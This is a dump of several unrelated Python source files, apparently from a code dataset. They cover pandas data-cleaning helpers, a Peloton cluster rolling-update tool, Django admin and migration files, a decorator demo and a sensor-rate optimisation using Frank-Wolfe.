            - 'ordinal': replace unique values by increasing numbers via sklearn's OrdinalEncoder
    Returns:
        - encoded_data: encoded DataFrame [pandas.DataFrame]
    '''
    ## never mutate the caller's data
    df = data.copy()
    ## coerce a Series into a one-column DataFrame; bail out on anything else
    if not type(df) == pd.DataFrame:
        if type(df) == pd.Series:
            df = pd.DataFrame(data)
            df.columns = ["Series_Data"]
        else:
            print("data is no pandas.DataFrame, cannot be further processed")
            return df
    ## candidate columns = all minus the ignored ones
    candidates = list(set(df.columns) - set(ignore_columns))
    ## pick the encoding callable
    if how == "binarizer":
        encode = lambda x: pd.get_dummies(x)
    elif how == "ordinal":
        enc = OrdinalEncoder()
        encode = lambda x: pd.DataFrame(enc.fit_transform(x), columns = x.columns)
    else:
        print("strategy not implemented (yet!). Using pandas.get_dummies() instead!")
        encode = lambda x: pd.get_dummies(x)
    ## string-typed columns get encoded, everything else passes through
    object_cols = [column for column in candidates if pd.api.types.is_string_dtype(df[column])]
    passthrough_cols = list(set(df.columns) - set(object_cols))
    encoded_data = pd.concat([encode(df[object_cols]), df[passthrough_cols]], axis = 1)
    return encoded_data
def check_nan(data:pd.Series) -> bool:
    '''
    checks whether given data contains NaN's

    Parameters:
        - data: data to check [pandas.Series or pandas.DataFrame]
    Returns:
        - True if data contains NaN's, otherwise False [Boolean]
    '''
    ## keep the caller's object untouched
    frame = data.copy()
    is_frame = type(frame) == pd.DataFrame
    is_series = type(frame) == pd.Series
    if not (is_frame or is_series):
        print("data is no pandas.DataFrame, no check for NaN's done")
        return False
    ## DataFrame needs a double sum (per column, then overall)
    missing = data.isna().sum().sum() if is_frame else data.isna().sum()
    return missing.astype(bool)
def add_nan(data:pd.DataFrame, amount:float = 0.05) -> pd.DataFrame:
    '''
    randomly replace the given fraction of cells with NaN's

    Parameters:
        - data: data to add NaN's to [pandas.DataFrame]
        - amount: desired fraction of NaN's [Float, default = 0.05]
    Returns:
        - nan_data: data containing the desired amount of NaN's [pandas.DataFrame]
    '''
    ## boolean mask, True with probability `amount` per cell
    mask = np.random.random(data.shape) < amount
    ## mask() replaces every True position with NaN
    return data.mask(mask)
def check_numeric(data:pd.DataFrame, ignore_columns:list = []) -> pd.DataFrame:
    '''
    convert all columns of a DataFrame to numeric ones; columns where
    `pandas.to_numeric()` fails (apparently strings) are dropped

    Parameters:
        - data: DataFrame with mixed column types [pandas.DataFrame]
        - ignore_columns: columns to leave untouched [List, default = []]
    Returns:
        - df: DataFrame with converted columns, failed columns removed [pandas.DataFrame]
    '''
    ## never mutate the caller's data
    df = data.copy()
    if not type(df) == pd.DataFrame:
        if type(df) == pd.Series:
            ## a Series is converted directly; refuse when anything coerces to NaN
            converted = pd.to_numeric(df, errors = "coerce")
            if converted.isna().sum() > 0:
                print("data cannot be converted to numerical data, you have to encode it")
                return df
            return converted
        print("data is no pandas.DataFrame, cannot be further processed")
        return df
    ## all columns except the ignored ones
    targets = list(set(df.columns) - set(ignore_columns))
    for column in tqdm(targets, desc="make all columns numerical"):
        ## unconvertible cells become NaN ...
        df[column] = pd.to_numeric(df[column], errors="coerce")
    ## ... and columns containing NaN's are dropped wholesale
    return df.dropna(axis=1)
def iter_columns(data:pd.DataFrame, columns:list, trait:str) -> str:
    '''
    generator over the given columns, yielding those whose content matches
    the desired trait

    Parameters:
        - data: DataFrame to iterate over [pandas.DataFrame]
        - columns: columns to check [List]
        - trait: what the columns shall be checked for [String]
            - 'unique': yield columns consisting of one single value
    Returns:
        - col: next column containing only one distinct value [String]
    '''
    for col in tqdm(columns, desc=f"handle {trait}'s'"):
        ## only the 'unique' trait is implemented so far
        if trait == "unique" and len(data[col].unique()) == 1:
            yield col
def handle_nans(data:pd.DataFrame, strategy:str = "null", ignore_columns:list = []) -> pd.DataFrame:
    '''
    fill NaN's using the given strategy and drop columns consisting only of NaN's

    Parameters:
        - data: DataFrame [pandas.DataFrame]
        - strategy: how to fill the NaN's [String]
            - 'null' (default): fill with 0
            - 'mean' / 'median' / 'min' / 'max': fill with the respective
              per-feature statistic
        - ignore_columns: columns to leave untouched [List, default = []]
    Returns:
        - df: DataFrame with NaN's filled; all-NaN columns removed [pandas.DataFrame]
    '''
    ## never mutate the caller's data
    df = data.copy()
    if not check_nan(df):
        print("no NaN's inside data")
        return df
    ## all columns except the ignored ones
    columns = list(set(df.columns) - set(ignore_columns))
    ## compute per-column fill values (removed: unused `cols` local and
    ## `columns.__len__()` dunder calls from the original)
    if strategy == "null":
        value = [0] * len(columns)
    elif strategy == "mean":
        value = df[columns].mean()
    elif strategy == "median":
        value = df[columns].median()
    elif strategy == "min":
        value = df[columns].min()
    elif strategy == "max":
        value = df[columns].max()
    else:
        print("strategy not implemented (yet). Filling with 0")
        value = [0] * len(columns)
    df = df.fillna(dict(zip(columns, value)))
    ## drop columns that ONLY contain NaN's, no matter what 'ignore_columns' says
    df = df.dropna(how = "all", axis = 1)
    return df
def handle_uniques(data:pd.DataFrame, ignore_columns:list = []) -> pd.DataFrame:
    '''
    function that handles all columns (=features) that only contain one different value by dropping them --> they do not contain helpful (any) information
    Parameters:
        - data: DataFrame [pandas.DataFrame]
        - ignore_columns: List of columns that shall be ignored [List, default = []]
    Returns:
        - df: DataFrame without deleted columns [pandas.DataFrame]
    '''
    ## make sure not to overwrite given data
    df = data.copy()
    ## only pandas.DataFrame objects can be processed
    if not isinstance(df, pd.DataFrame):
        print("data is no pandas.DataFrame, cannot be further processed")
        return df
    ## remaining columns that shall be checked (all - ignore_columns)
    columns = list(set(df.columns) - set(ignore_columns))
    ## collect all single-valued columns in one pass and drop them together
    cols = list(iter_columns(df, columns, "unique"))
    df = df.drop(cols, axis=1)
    return df
def drop_features(data:pd.DataFrame, columns:list = []) -> pd.DataFrame:
    '''
    function that removes the given columns from the DataFrame
    Parameters:
        - data: DataFrame with time columns [pandas.DataFrame]
        - columns: List of columns that shall be deleted [List, default = []]
    Returns:
        - df: DataFrame without deleted columns [pandas.DataFrame]
    '''
    ## work on copies so neither the input data nor the given column list change
    to_drop = columns.copy()
    frame = data.copy()
    ## only pandas.DataFrame objects can be processed
    if not type(frame) == pd.DataFrame:
        print("data is no pandas.DataFrame, cannot be further processed")
        return frame
    return frame.drop(to_drop, axis=1)
def flatten(X:np.array) -> np.array:
    '''
    flattens a 3D array into 2D array
    Parameters:
        - X: a 3D array with shape samples x width x height [numpy.array]
    Returns:
        - flattened_X: 2D array with shape sample x width*height [numpy.array]
    '''
    ## keep the sample axis, collapse every remaining axis into one
    return X.reshape(X.shape[0], -1)
def iter_scale(X:np.array, scaler:object) -> np.array:
    '''
    generator that iterates over the given X and scales each sample with the
    given (already fitted) scaler
    Parameters:
        - X: 3D array with shape samples x length x features [numpy.array]
        - scaler: fitted scaler object, e.g., sklearn.preprocessing.StandardScaler [object]
    Yields:
        - the scaled sample, same shape as the corresponding input sample [numpy.array]
    '''
    ## copy X to make sure not to overwrite the original data
    scaled_X = X.copy()
    for X_to_scale in tqdm(scaled_X):
        ## scalers expect 2D input -> flatten, scale, then restore the sample's shape
        yield scaler.transform(X_to_scale.reshape(1, -1)).reshape(X_to_scale.shape)
def pca(X:np.array, y:np.array) -> (np.array, np.array):
    '''
    reduces X to two dimensions using a PCA
    Parameters:
        - X: Array containing the original x values [numpy.array]
        - y: Array containing the labels [numpy.array]
    Returns:
        - X_transformed: Array containing the transformed x values [numpy.array]
        - y: Array containing the labels (passed through unchanged) [numpy.array]
    '''
    ## init pca with two components; do not shadow this function's own name
    reducer = PCA(n_components = 2)
    ## copy data to be sure not to accidentally overwrite something
    pca_x = X.copy()
    ## PCA needs 2D input: flatten everything beyond the sample axis
    ## (example: shape [60, 28, 28] becomes [60, 784])
    if pca_x.ndim > 2:
        print("Dimension too high, X gets reshaped")
        pca_x = pca_x.reshape(X.shape[0], -1)
    ## fit PCA, transform data
    X_transformed = reducer.fit_transform(pca_x, y)
    return X_transformed, y
def plot_reduced_data(X_new:np.array, y:np.array) -> None:
    '''
    plots a scatter showing the transformed dataset (if it is <= 2D) with different coloring for the different classes
    Parameters:
        - X_new: Array containing the transformed x values [numpy.array]
        - y: Array containing the labels [numpy.array]
    Returns:
        - None
    NOTE(review): despite the numpy.array annotation, `y` must support
    `.reset_index()`, i.e. it is effectively expected to be a pandas.Series
    -- confirm against the callers
    '''
    ## make DataFrame from transformed x values, add information about labels, rename the columns
    reduced_data = pd.DataFrame(X_new).reset_index(drop = True)
    ## 1D input: add a constant second coordinate so it can still be scattered
    if reduced_data.columns.__len__() == 1:
        reduced_data["y"] = 0
    reduced_data.columns = ["x","y"]
    reduced_data["Label"] = y.reset_index(drop = True)
    ## make a list of SubDataSets that each only contain data about respective label
    subdata = [reduced_data[reduced_data["Label"] == label] for label in np.unique(y)]
    ## set size, init figure
    size = 10
    fig=plt.figure(figsize=(2*size,size))
    ## add plots
    ax = fig.add_subplot()
    ## one distinguishable color per class (tableau palette first, then base colors)
    colors = list(mcolors.TABLEAU_COLORS) + list(mcolors.BASE_COLORS)
    for i in range(len(subdata)):
        ax.scatter(subdata[i]["x"], subdata[i]["y"], color = colors[i], label = i)
    ## update layout, without ticklabels and the grid to be on
    ax.set_xticklabels([])
    ax.set_yticklabels([])
    ax.grid(True)
    ## set title, new legend, save figure, show plot
    ax.set_title(f"Plot of the reduced data after PCA, colored in respective label", size=2*size)
    ## legends with many entries clutter the plot -> hide beyond 12 classes
    if subdata.__len__() > 12:
        ax.legend().set_visible(False)
    else:
        ax.legend(prop={'size': 1.5*size})
    plt.show()
def evaluate_model(clf:object, X:np.array, y:np.array) -> None:
    '''
    evaluates the given model with given data, prints different metrices [accuracy, precision, recall, f1 score]
    Parameters:
        - clf: model to evaluate [object]
        - X: x values [np.array]
        - y: labels [np.array]
    Returns:
        - None (metrics are printed, confusion matrix is plotted)
    '''
    ## split data to train and test samples, fit classifier
    X_train, X_test, y_train, y_test = train_test_split(X, y)
    clf.fit(X_train, y_train)
    ## init plot
    size = 10
    fig=plt.figure(figsize=(2*size,size))
    ax=fig.add_subplot()
    ## plot confusion matrix, normalized over the true labels
    ## NOTE(review): plot_confusion_matrix was removed in scikit-learn >= 1.2
    ## (replaced by ConfusionMatrixDisplay.from_estimator) -- confirm the
    ## pinned sklearn version
    plot_confusion_matrix(clf, X_test, y_test, normalize="true", ax = ax, cmap=plt.cm.Blues)
    ## predict test samples
    y_pred = clf.predict(X_test)
    ## calculate the metrics (weighted averaging to account for class imbalance)
    accuracy = balanced_accuracy_score(y_test, y_pred)
    precision = precision_score(y_test, y_pred,average="weighted")
    recall = recall_score(y_test, y_pred,average="weighted")
    f1 = f1_score(y_test, y_pred,average="weighted")
    ## print results
    print(f"Acc: {accuracy * 100:.2f}%")
    print(f"Precision: {precision:.2f}")
    print(f"Recall: {recall:.2f}")
    print(f"F1 score: {f1:.2f}")
23,115 | 2a9714c75b065746a082cad00e3364a3d3aaf142 | from __future__ import absolute_import
import yaml
import json
import json_delta
from prompter import yesno
from thrift import TSerialization
from thrift.protocol.TJSONProtocol import TSimpleJSONProtocolFactory
from aurora.client import AuroraClientZK
from app import App, CronApp
# Currently DB schema migration is executed only in hostmgr so we have
# to update hostmgr first.
# TODO: use a separate binary for DB migration
## Peloton components in rolling-update order; hostmgr runs the DB schema
## migration and therefore must be updated first (see comment above)
PELOTON_APPS = [
    "hostmgr",
    "resmgr",
    "placement",
    "placement_stateful",
    "placement_stateless",
    "jobmgr",
    "archiver",
    "aurorabridge",
]
## cron-style apps, scheduled via Aurora cron rather than as services
CRON_APPS = ["watchdog"]
def update_callback(app):
    """
    Callback function for updating Peloton apps so that we can run
    integration tests in-between updates of each app.
    """
    message = "Update callback invoked for %s" % app.name
    print(message)
    # TODO: Add integration tests here
    return True
class Cluster(object):
    """
    Representation of a Peloton cluster.

    Built from a yaml config file (see `load`); every top-level config key is
    copied onto the instance, and per-app configs are looked up as attributes
    named after the entries of PELOTON_APPS / CRON_APPS.
    """

    def __init__(self, cfg_file, **kwargs):
        self.auto_migrate = False
        self.use_host_pool = False
        # copy all config keys (zookeeper, aurora_zk_path, per-app configs, ...)
        # onto the instance; items() replaces the py2-only iteritems() and works
        # on both python 2 and 3
        for k, v in kwargs.items():
            setattr(self, k, v)
        self.client = AuroraClientZK.create(
            zk_endpoints=self.zookeeper, zk_path=self.aurora_zk_path
        )
        self.cfg_file = cfg_file
        self.apps = []
        # apps without a config entry are simply skipped
        for app in PELOTON_APPS:
            app_cfg = getattr(self, app, None)
            if app_cfg is None:
                continue
            self.apps.append(App(name=app, cluster=self, **app_cfg))
        for app in CRON_APPS:
            app_cfg = getattr(self, app, None)
            if app_cfg is not None:
                self.apps.append(CronApp(name=app, cluster=self, **app_cfg))
            else:
                print(
                    "Skipping cron app, existing cron will have to be disabled using `aurora deschedule` command"
                )

    @staticmethod
    def load(cfg_file):
        """
        Load the cluster config from a yaml file
        """
        with open(cfg_file, "r") as f:
            try:
                # safe_load: never instantiate arbitrary python objects from
                # the (potentially shared) cluster config file
                cfg = yaml.safe_load(f)
            except yaml.YAMLError as ex:
                print("Failed to unmarshal cluster config %s" % cfg_file)
                raise ex
        return Cluster(cfg_file, **cfg)

    def diff_config(self, app, verbose=False):
        """
        Print the diff between current and desired job config
        """
        print(">>>>>>>> Job config diff for %s <<<<<<<<" % app.name)
        cfg_dicts = []
        factory = TSimpleJSONProtocolFactory()
        # serialize both configs to JSON dicts so json_delta can diff them
        for cfg in app.current_job_config, app.desired_job_config:
            if cfg:
                cfg_json = TSerialization.serialize(
                    cfg, protocol_factory=factory
                )
                cfg_dict = json.loads(cfg_json)
                # Unset task resources to avoid confusing the job config differ
                cfg_dict["taskConfig"]["resources"] = None
            else:
                cfg_dict = {}
            cfg_dicts.append(cfg_dict)
        if verbose:
            for cfg_dict in cfg_dicts:
                print(json.dumps(cfg_dict, indent=4, sort_keys=True))
        for line in json_delta.udiff(cfg_dicts[0], cfg_dicts[1]):
            print(line)

    def update(self, force, verbose):
        """
        Rolling update the Peloton apps in the cluster.

        Returns True on success, False when an app update failed (after
        rolling back all already-updated apps), and None when the user
        declined the confirmation prompt.
        """
        # Print the job config diffs
        print('Update Peloton cluster "%s" to new config: ' % self.name)
        for app in self.apps:
            self.diff_config(app, verbose)
        if not force and not yesno("Proceed with the update ?"):
            return
        updated_apps = []
        for app in self.apps:
            updated_apps.append(app)
            if not app.update_or_create_job(update_callback):
                # Rollback the updates for all apps that have been updated
                self.rollback(updated_apps)
                return False
        return True

    def rollback(self, apps):
        """
        Rollback the updates to the list of apps in the cluster
        (consumes the given list).
        """
        while apps:
            app = apps.pop()
            print("Rolling back app %s ..." % app.name)
            app.rollback_job()
|
def missing_number(first_list, second_list):
    """
    Return the element that is present in the longer of the two lists but
    missing from the shorter one; 0 when both lists have the same length
    (including when both are empty).

    The previous implementation sorted both lists and returned the last
    element of the longer one, which is only the missing element when the
    missing element happens to be the maximum. The difference of the sums
    isolates the extra element correctly, in O(n) and without sorting.
    """
    if len(first_list) == len(second_list):
        return 0
    # the longer list contains exactly one extra element; the sum difference
    # is that element regardless of its position or magnitude
    return abs(sum(first_list) - sum(second_list))
|
23,117 | 260328ffb9ba1764f25bbc8a4a9bc8c62c8441c3 | from django.contrib import admin
from .models import Category,Product
# Register your models here.
class CategoryAdmin(admin.ModelAdmin):
    """Admin for Category: expose only the name on the edit form."""
    fields = ("name",)


admin.site.register(Category, CategoryAdmin)
class ProductAdmin(admin.ModelAdmin):
    """Admin for Product: edit form fields, list columns, filters, inline edits."""
    # fields shown on the add/change form
    fields = (
        'category',
        'name',
        'Image',
        'description',
        'price',
        'max_quantity',
        'available',
    )
    # columns of the change list page
    list_display = ('name', 'category', 'price', 'max_quantity', 'available', 'created')
    # sidebar filters
    list_filter = ('available', 'created', 'category')
    # editable directly from the change list
    list_editable = ('price', 'max_quantity', 'available')


admin.site.register(Product, ProductAdmin)
23,118 | 863f7a6f0941e58297ddd327582061dc9114503e | # coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""SeqIO postprocessors for wikidiff tasks."""
import json
from language.fruit import tf_utils
import tensorflow as tf
@tf.autograph.experimental.do_not_convert
def postprocess_wikidiff(
    output,
    vocabulary,
    normalize_fn,
    is_target=False,
    example=None,
):
  """Applies normalization to outputs."""
  del is_target
  # decode the model input back to text via the vocabulary
  decoded_inputs = tf_utils.maybe_decode(
      vocabulary.decode_tf(example["inputs"]).numpy())
  decoded_targets = tf_utils.maybe_decode(output)
  # apply the task-specific normalization to both sides
  norm_inputs, norm_targets = normalize_fn(decoded_inputs, decoded_targets)
  surfaces = json.loads(
      tf_utils.maybe_decode(example["generatable_surfaces"]))
  return {
      "inputs": decoded_inputs,
      "targets": decoded_targets,
      "normalized_inputs": norm_inputs,
      "normalized_targets": norm_targets,
      "generatable_surfaces": surfaces,
  }
|
23,119 | ffd6fc0d68bf907d3a77d5ca0fb01df607ad85f4 | class _Decorator:
def __init__(self):
self._func = None
def _call(self, *args, **kwargs):
return self._func(*args, **kwargs)
def __call__(self, func):
self._func = func
return self._call
class _DecoratorDecorator(_Decorator):
    """Decorator that can stack on top of another _Decorator (its base)."""

    def __init__(self, base: _Decorator = None):
        # optional inner decorator this one delegates to
        self._base = base
        super().__init__()

    def _call(self, *args, **kwargs):
        # with a base present, delegate the actual call to it
        if self._base is not None:
            return self._base._call(*args, **kwargs)
        return super()._call(*args, **kwargs)

    def __call__(self, func):
        self._func = func
        # register the function with the base too, so the whole chain sees it
        if self._base is not None:
            self._base.__call__(func)
        return self._call
class debug(_DecoratorDecorator):
    """Decorator that prints the wrapped function's name, arguments and result.

    NOTE: the printed lines use f-string `=` specifiers, so the local variable
    names (`args`, `kwargs`, `result`) are part of the output format and must
    not be renamed.
    """
    def _call(self, *args, **kwargs):
        print(f'DEBUG: name={self._func.__name__}')
        print(f'DEBUG: {args=}')
        print(f'DEBUG: {kwargs=}')
        ## run the wrapped function (or the chained base decorator)
        result = super()._call(*args, **kwargs)
        print(f'DEBUG: {result=}')
        return result
class Tracker(_DecoratorDecorator):
    """Decorator that records every call (args, kwargs, return) per function name."""

    def __init__(self, base=None):
        super().__init__(base=base)
        # mapping: function name -> list of call records
        self._calls = {}

    def _call(self, *args, **kwargs):
        outcome = super()._call(*args, **kwargs)
        record = {
            'args': args,
            'kwargs': kwargs,
            'return': outcome
        }
        # append to the function's history, creating it on first call
        self._calls.setdefault(self._func.__name__, []).append(record)
        return outcome

    def __getitem__(self, name):
        return self._calls[name]

    def __str__(self) -> str:
        return str(self._calls)

    def __iter__(self):
        return iter(self._calls)


# module-level tracker instance shared by the demo below
track = Tracker()
class memoize(_DecoratorDecorator):
    """Decorator that caches results keyed by the call's args and sorted kwargs."""

    def __init__(self, base: _Decorator = None):
        super().__init__(base)
        # cache: (args tuple, sorted kwargs tuple) -> result
        self.cache = {}

    def _call(self, *args, **kwargs):
        key = (tuple(args), tuple(sorted(kwargs.items())))
        try:
            # cache hit: the chained base decorator is NOT invoked again
            return self.cache[key]
        except KeyError:
            outcome = super()._call(*args, **kwargs)
            self.cache[key] = outcome
            return outcome
@memoize(track)
def foo(x, y):
    ## memoized and (via the chained Tracker) call-tracked addition
    return x + y

## hammer the memoized function; only the first call misses the cache and
## reaches the tracker, so the printed length is 1
for _ in range(500000):
    foo(3, 5)
print(len(track['foo']))
|
23,120 | 6f424a788b72c7ebb0e13e7102f9a8503daa72d9 | # Generated by Django 3.0.8 on 2020-07-20 01:16
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration: tighten FK behavior on Project.account and Snapshot.job."""

    dependencies = [
        ('jobs', '0002_auto_20200708_2203'),
        ('accounts', '0002_models'),
        ('projects', '0004_add_project_temporary'),
    ]

    operations = [
        # deleting an Account cascades to its projects
        migrations.AlterField(
            model_name='project',
            name='account',
            field=models.ForeignKey(help_text='Account that the project belongs to.', on_delete=django.db.models.deletion.CASCADE, related_name='projects', to='accounts.Account'),
        ),
        # deleting a Job keeps the snapshot and nulls its job reference
        migrations.AlterField(
            model_name='snapshot',
            name='job',
            field=models.ForeignKey(blank=True, help_text='The job that created the snapshot', null=True, on_delete=django.db.models.deletion.SET_NULL, to='jobs.Job'),
        ),
    ]
|
23,121 | d5d7d8f1f9e600f17671ad74556fd7aff2bd1f66 | import numpy as np
import matplotlib.pyplot as plt
from tqdm import tqdm
import random
import time
import copy
import itertools
from scipy.integrate import quad
from scipy.spatial import KDTree
from scipy.optimize import brentq
def return_zj(selectRates,d):
    """Return z(x) = prod_i (1 - r_i * (x - d)) as a callable of x."""
    def zj(x):
        return np.prod(1. - np.array(selectRates) * (x - d))
    return zj
def comp1(selectRates,d,removedRate):
    """Return the integrand -(x - d) * prod_i (1 - r_i * (x - d)) as a callable of x.

    NOTE(review): `removedRate` is accepted but never used -- kept only for
    compatibility with the call sites.
    """
    def integrand(x):
        return -(x - d) * np.prod(1. - np.array(selectRates) * (x - d))
    return integrand
def comp2(selectRates,d,max_rate):
    """Boundary term of the age integral evaluated at x = d + 1/max_rate.

    NOTE(review): `d` is accepted but unused -- kept for call-site compatibility.
    """
    inv = 1. / max_rate
    return -(inv ** 2) * np.prod(1. - np.array(selectRates) * inv)
def objective_function_MinAge(N, d, ratePerSensor, numSelectedSensors, setofSelectedSensors, allPossibleSets, selectedPartitionsArea):
    '''
    area-weighted average age over all partitions for the given per-sensor rates:
    sum_p area_p * age_p / sum_p area_p, where age_p = d + integral of z over
    [d, d + 1/r_max]
    NOTE(review): `setofSelectedSensors` is compared elementwise inside
    np.where, so it must be a numpy array -- confirm at the call sites.
    `N` and `numSelectedSensors` are unused in this body.
    '''
    objFn = 0.
    tempObjFn = []
    for p in range(len(selectedPartitionsArea)):
        selectRates = []
        if selectedPartitionsArea[p] != 0:
            ## collect the rates of the sensors covering partition p
            for s in range(len(allPossibleSets[p])):
                idx = np.where(setofSelectedSensors == allPossibleSets[p][s])[0][0]
                selectRates.append(ratePerSensor[idx]) #select the corresponding rates
            r_max = max(selectRates)
            ## age of partition p: d plus the integral of z over [d, d + 1/r_max]
            result = quad(return_zj(selectRates,d), d, d+1./r_max)
            tempObjFn.append(d+result[0])
        else:
            ## empty partitions contribute nothing
            tempObjFn.append(0.)
    ## list * ndarray multiplies elementwise (selectedPartitionsArea is an ndarray)
    objFn = np.sum(tempObjFn*selectedPartitionsArea)/np.sum(selectedPartitionsArea)
    return objFn
def gradient_obj_fn_MinAge(N, ratePerSensor, numSelectedSensors, setofSelectedSensors, allPossibleSets, selectedPartitionsArea,d):
    '''
    gradient of the area-weighted age objective w.r.t. the per-sensor rates,
    accumulated partition by partition
    NOTE(review): `setofSelectedSensors` must be a numpy array (elementwise
    `==` inside np.where) -- confirm at the call sites.
    '''
    grad_MinAge = np.zeros(int(numSelectedSensors))
    for p in range(len(selectedPartitionsArea)):
        selectedRates = []
        if selectedPartitionsArea[p] != 0:
            ## gather the rates of the sensors covering partition p
            for s in range(len(allPossibleSets[p])):
                idx = np.where(setofSelectedSensors == allPossibleSets[p][s])[0][0]
                selectedRates.append(ratePerSensor[idx])
            max_rate = max(selectedRates)
            for s in range(len(allPossibleSets[p])):
                idx = np.where(setofSelectedSensors == allPossibleSets[p][s])[0][0]
                if ratePerSensor[idx] == max_rate:
                    ## the max-rate sensor also moves the upper integration limit
                    ## d + 1/max_rate, hence the extra boundary term from comp2
                    temp1 = comp1(np.delete(selectedRates,s),d,selectedRates[s])
                    result = quad(temp1, d, d+1./max_rate)
                    temp2 = comp2(selectedRates,d,max_rate)
                    grad_MinAge[idx] = grad_MinAge[idx] + (result[0]+temp2)*selectedPartitionsArea[p]/np.sum(selectedPartitionsArea)
                else:
                    ## non-maximal rates only contribute through the integrand
                    temp1 = comp1(np.delete(selectedRates,s),d,selectedRates[s])
                    result = quad(temp1, d, d+1./max_rate)
                    grad_MinAge[idx] = grad_MinAge[idx] + (result[0])*selectedPartitionsArea[p]/np.sum(selectedPartitionsArea)
    return grad_MinAge
def frank_wolfe(N,ratePerSensor, numSelectedSensors, setofSelectedSensors, allPossibleSets, selectedPartitionsArea, t, capacity,d):
    '''
    one Frank-Wolfe step on the rate vector: move toward the vertex of the
    l1-ball of radius `capacity` that minimizes the linearized objective,
    with the standard diminishing step size 2/(t+2)
    '''
    ## gradient of the area-weighted age objective at the current rates
    grad = gradient_obj_fn_MinAge(N,ratePerSensor, numSelectedSensors, setofSelectedSensors, allPossibleSets, selectedPartitionsArea,d)
    ## vertex step: single nonzero of magnitude `capacity` along the largest
    ## gradient component, signed against the gradient
    idx = np.argmax(np.abs(grad))
    s = np.zeros(len(ratePerSensor))
    s[idx] = -capacity * np.sign(grad[idx])
    eta = 2./(t+2.)
    ratePerSensor = ratePerSensor + eta*(s-ratePerSensor)
    ## keep rates strictly positive; clamp non-positive entries to 1/d
    ratePerSensor[ratePerSensor<=0]=1./d
    return ratePerSensor
def descent(N,update, d, numSelectedSensors, setofSelectedSensors, allPossibleSets, selectedPartitionsArea, capacity, T=250):
    '''
    runs T iterations of the given update rule (e.g. frank_wolfe) on the rate
    vector, recording the objective value and l1 norm at every iteration
    Parameters:
        - update: callable implementing one step, called as
          update(N, rates, numSelectedSensors, setofSelectedSensors,
                 allPossibleSets, selectedPartitionsArea, t, capacity, d)
        - T: number of iterations [int, default = 250]
    Returns:
        - ratePerSensor: final rate vector
        - obj_fn: objective value per iteration
        - l1: l1 norm of the rates per iteration
    '''
    ratePerSensor = 1.*np.ones(int(numSelectedSensors))
    obj_fn = []
    l1 = []
    for t in range(T):
        ## update the rates (either subgradient or frank-wolfe step)
        ratePerSensor = update(N,ratePerSensor, numSelectedSensors, setofSelectedSensors, allPossibleSets, selectedPartitionsArea, t, capacity, d)
        ## record l1 norm and objective value; the original guard
        ## `(t % 1 == 0) or (t == T - 1)` was always true, so every
        ## iteration is recorded -- the vacuous condition is dropped
        l1.append(np.sum(abs(ratePerSensor)))
        obj_fn.append(objective_function_MinAge(N,d, ratePerSensor, numSelectedSensors, setofSelectedSensors, allPossibleSets, selectedPartitionsArea))
    return ratePerSensor, obj_fn, l1
def generatePixelsCenters(xPosCenterPixel1, yPosCenterPixel1, pixelLength, pixelWidth, numSquaresperLength, numSquaresperWidth):
    '''
    builds the grid of pixel-center coordinates row by row, starting from the
    center of the first pixel
    Returns:
        - coordPixels: the pixel centers; a numpy array of shape
          (numSquaresperLength * numSquaresperWidth, 2) for grids with more
          than one pixel (a plain [[x, y]] list for a 1x1 grid, as before)
    '''
    coordPixels = []
    xCoord = xPosCenterPixel1
    yCoord = yPosCenterPixel1
    for i in range(numSquaresperLength):
        if i != 0:
            ## new row: advance x, reset y to the first column
            xCoord = xCoord + pixelLength
            yCoord = yPosCenterPixel1
        for j in range(numSquaresperWidth):
            if j != 0:
                yCoord = yCoord + pixelWidth
            newrow = np.array([xCoord,yCoord])
            ## BUGFIX-CLARITY: the original guard `i == 0 | j == 0` was a
            ## chained comparison that only held for the very first pixel,
            ## i.e. it effectively meant `i == 0 and j == 0` -- made explicit
            if i == 0 and j == 0:
                coordPixels.append([xPosCenterPixel1,yPosCenterPixel1])
            else:
                coordPixels = np.vstack([coordPixels, newrow])
    return coordPixels
def pixelisInCircle(sensor,sensorRadius,pixel,coordPixels,coordSensors):
    """Return 1 if the pixel's center lies within the sensor's coverage circle, else 0."""
    dx = coordPixels[pixel][0] - coordSensors[sensor][0]
    dy = coordPixels[pixel][1] - coordSensors[sensor][1]
    return 1 if np.sqrt(dx ** 2 + dy ** 2) <= sensorRadius else 0
def findsubsets(s, n):
    """Return all n-element combinations of s as a list of tuples."""
    combos = itertools.combinations(s, n)
    return list(combos)
def findPartitionsAreas(pixelLength, pixelWidth, coordPixels,coordSensors,sensorRadius,N):
    '''
    pixel-counting estimate of the area of every coverage partition (the region
    covered by exactly one subset of the N sensors)
    Returns:
        - areas: per-partition pixel count times the pixel area, indexed like
          allPossibleSets
        - allPossibleSets: all non-empty subsets of {1..N}, ordered by size
    '''
    ## per-pixel scratch: count of covering sensors / one-hot partition marker
    tempPartitionsPixels = np.zeros(2**N-1)
    partitionsPixels = np.zeros(2**N-1)
    temp = np.zeros(2**N-1)
    temp1 = []
    allPossibleSets = []
    ## enumerate all non-empty subsets of {1..N}, smallest subsets first
    for ii in range(1,N+1):
        hello = findsubsets(np.arange(1,N+1,1),ii)
        #hello1 = (np.asarray(hello))
        for jj in range(len(hello)):
            allPossibleSets.append(list(hello[jj]))
    for pixel in range(len(coordPixels)):
        ## mark every sensor whose circle contains this pixel's center
        for sensor in range(N):
            if pixelisInCircle(sensor,sensorRadius,pixel,coordPixels,coordSensors) == 1:
                tempPartitionsPixels[sensor] = tempPartitionsPixels[sensor] + 1
        if np.sum(tempPartitionsPixels) > 1:
            ## covered by several sensors: translate the covering sensor set
            ## into its index within allPossibleSets
            idxOnes = np.nonzero(tempPartitionsPixels)
            for ii in range(idxOnes[0].size):
                temp1.append(idxOnes[0][ii]+1)
            idxPartition = allPossibleSets.index(temp1)
            temp[idxPartition] = 1
        else:
            ## covered by at most one sensor: singleton-subset indices coincide
            ## with sensor indices, so the marker can be used directly
            temp = tempPartitionsPixels
        partitionsPixels = partitionsPixels + temp
        ## reset the per-pixel scratch buffers
        tempPartitionsPixels = np.zeros(2**N-1)
        temp = np.zeros(2**N-1)
        temp1 = []
    return partitionsPixels*pixelLength*pixelWidth, allPossibleSets
